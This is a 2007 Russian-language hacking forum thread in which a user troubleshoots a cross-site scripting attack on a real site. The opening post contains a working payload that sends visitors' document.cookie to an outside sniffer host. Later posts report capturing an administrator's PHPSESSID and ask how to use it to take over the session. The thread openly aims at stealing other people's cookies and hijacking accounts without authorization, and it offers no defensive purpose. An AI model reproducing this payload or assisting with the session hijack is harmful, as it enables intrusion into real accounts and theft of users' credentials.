Подскажите

Discussion in 'Песочница' started by Perec333, 9 Sep 2007.

  1. Perec333

    Perec333 New Member

    Joined:
    7 Sep 2007
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Подскажите плиз, почему на эту ссылку, на снифак приходят тока мои куки(xss в теме сообщения)
    <script>img = new Image(); img.src = "http://s.netsec.ru/mda.gif?"+document.cookie;</script>
     
  2. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Хм, наверное потому что пока только ты просмотрел эту тему
     
    1 person likes this.
  3. inlanger

    inlanger Elder - Старейшина

    Joined:
    7 Jan 2007
    Messages:
    985
    Likes Received:
    283
    Reputations:
    27
    вместо mda.gif впиши свой_ник.gif
     
  4. Perec333

    Perec333 New Member

    Joined:
    7 Sep 2007
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    я конечно не знаток в хаке но со сниффером справиться могу и сообщение мои читали(так как на них отвечали))) Есть еще предложения?)) Вот еще зашел под другим пользователем посмотрел письмо с xss которое я отправил от другово своего пользователи, кукисы пришли, как будто на сниф только мои приходят
     
    #4 Perec333, 9 Sep 2007
    Last edited: 9 Sep 2007
  5. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    Сомневаюсь в подобном раскладе. Если они все таки заходят, то не может быть в принципе что твои приходят, а их нет.
     
  6. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    778
    Likes Received:
    324
    Reputations:
    83
    А ты недумал что в некоторвх браузерах XSS непашет :)
     
  7. Perec333

    Perec333 New Member

    Joined:
    7 Sep 2007
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Дык не на одном человеке проверял, у всех непохать не может))))
     
  8. Perec333

    Perec333 New Member

    Joined:
    7 Sep 2007
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    наконецто поймал кукисы но тут возник другой вопрос, поймал PHPSESSID админа через инеткрэк послал пакет , посмотрел его страницу в инет креке, как я могу это использовать?в кукисах PHPSESSID не нахожу, они создаются тока когда ставишь галочку на "запомнить мнея" в виде login- xxxx pass-md5(xxx) а PHPSESSID нету...
     
Loading...
Similar Threads - Подскажите
  1. navai
    Replies:
    3
    Views:
    3,112